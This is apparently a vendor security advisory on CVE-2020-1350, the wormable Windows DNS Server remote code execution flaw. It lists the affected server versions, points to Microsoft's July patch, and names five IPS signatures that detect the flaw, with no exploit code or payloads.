To exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server.

This vulnerability (CVE-2020-1350) is classified as a ‘wormable’ vulnerability and has a CVSS base score of 10. Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction.

This issue affects the following Windows Server versions. Non-Microsoft DNS Servers are not affected.

  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019
  • Microsoft Windows Server version 1803 (Server Core installation)
  • Microsoft Windows Server version 1903 (Server Core installation)
  • Microsoft Windows Server version 1909 (Server Core installation)
  • Microsoft Windows Server version 2004 (Server Core installation)

Microsoft has patched this vulnerability in its July patch Tuesday updates. Users are encouraged to patch their systems as soon as possible.

SonicWall Capture Labs provides protection against this threat via the following signature:

      • IPS 15069: Windows DNS Server Remote Code Execution (CVE-2020-1350) 1
      • IPS 15073: Windows DNS Server Remote Code Execution (CVE-2020-1350) 2
      • IPS 15074: Windows DNS Server Remote Code Execution (CVE-2020-1350) 3
      • IPS 15075: Windows DNS Server Remote Code Execution (CVE-2020-1350) 4
      • IPS 15076: Windows DNS Server Remote Code Execution (CVE-2020-1350) 5